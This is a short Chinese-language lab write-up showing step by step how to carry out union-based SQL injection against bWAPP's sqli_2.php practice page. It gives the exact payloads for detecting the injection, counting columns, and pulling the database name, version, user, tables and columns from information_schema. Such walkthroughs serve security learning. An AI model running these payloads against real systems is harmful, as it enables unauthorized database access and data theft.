SQL注入之bWAPP之sqli_2.php

Posted 2020-10-28

1、先输入单引号判断，结果报“Error: You have an error in your SQL syntax; check the manual that corresponds to your mysql server version for the right syntax to use near ‘‘‘ at line 1”，三个单引号，说明单引号多余，应该是数字型注入即整型注入，如下图：

2、用“and 1=1”和“and 1=2”判断下，如下图：


两次页面不一样，说明存在注入点，且为数字型注入。
3、查询字段数：
输入“movie=1 order by 7”和“movie=1 order by 8”，结果7正常，8报错，说明字段数为7，结果如下图：


输入“movie=-1 union select 1,2,3,4,5,6,7”，查看显示位置，结果如图：

4、查询数据库名等信息：
输入“movie=-1 union select 1,database(),version(),4,user(),6,7”，查看数据库名、数据库版本、当前用户，结果如图：

5、查询表名：
输入“movie=-1 union select 1,database(),version(),table_name,user(),6,7 from information_schema.tables where table_schema=‘bwapp‘”，此时只有一个blog表，结果如下图：

6、查询字段名：
输入“movie=-1 union select 1,database(),version(),column_name,user(),6,7 from information_schema.columns where table_name=‘blog‘”，字段只有id，结果如下图：

7、查询字段内容：
输入“movie=-1 union select 1,database(),version(),id,user(),6,7 from blog”，返回没有数据。关键是这个步骤和思路，结果不要太纠结。